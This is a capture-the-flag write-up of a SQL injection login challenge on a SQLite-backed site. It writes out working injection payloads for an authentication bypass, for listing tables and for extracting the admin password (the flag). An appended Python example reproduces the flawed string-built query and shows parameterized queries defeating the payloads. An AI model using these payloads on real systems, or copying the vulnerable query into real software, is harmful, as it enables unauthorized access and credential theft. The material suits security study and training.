Login as admin!
Problem
Login as admin. And get the flag! The flag is the password of admin.
http://arrive.chal.mmactf.link/login.cgi
You can use test:test.
# | Your Score | Score | Teams |
---|---|---|---|
1 | 30 | 30 | 318 |
Problem Page [ http://arrive.chal.mmactf.link/login.cgi ]
This problem is SQL injection, and the database is SQLite.
Let's exploit!
First, I simply send a query:
POST DATA : username=admin' --&password=1
Congratulations!!
You are admin user.
The flag is your password!
logout
Oh... the flag is admin's password.
Therefore, I find the table name.
POST DATA : username=admin' union select name, NULL from sqlite_master--&password=1
Table name is 'user'.
So I inject the username with a UNION command:
POST DATA : username=admin' union select password,NULL from user limit 0,1--&password=1
You are MMA{cats_alice_band} user.
Good!
Flag is MMA{cats_alice_band}
Actually, this problem does no filtering.
So you can use blind SQL injection.
Author : shpik (http://shpik.tistory.com)
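Why the payloads above succeed, and what stops them, shown as an added example that is not part of the original write-up or the challenge's code. The query shape, the `user` table columns, the function names and the sample password are assumptions; the challenge's server-side source is not shown on the page.

```python
import sqlite3

# Constructed sample data; the real challenge schema is not shown on the page.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (username TEXT, password TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?)",
                   [("admin", "MMA{constructed_flag}"), ("test", "test")])
    return db

def login_vulnerable(db, username, password):
    """Assumed shape of the flawed login: input is pasted into the SQL text."""
    sql = ("SELECT username, password FROM user "
           "WHERE username='%s' AND password='%s'" % (username, password))
    row = db.execute(sql).fetchone()
    return row[0] if row else None  # shown to the client as "You are ... user."

def login_parameterized(db, username, password):
    """Same query with bound parameters: input can never become SQL syntax."""
    row = db.execute(
        "SELECT username, password FROM user WHERE username=? AND password=?",
        (username, password)).fetchone()
    return row[0] if row else None

# The two username values sent in the write-up above (password is always "1").
PAYLOADS = [
    "admin' --",
    "admin' union select password,NULL from user limit 0,1--",
]

def compare(db):
    """Return (payload, vulnerable result, parameterized result) per payload."""
    return [(p, login_vulnerable(db, p, "1"), login_parameterized(db, p, "1"))
            for p in PAYLOADS]

if __name__ == "__main__":
    db = make_db()
    for payload, vuln, fixed in compare(db):
        print("%-58s vulnerable=%r parameterized=%r" % (payload, vuln, fixed))
    print("test:test ->", login_parameterized(db, "test", "test"))
```

With bound parameters both payloads are compared as literal usernames and match no row, while the legitimate `test:test` login still works.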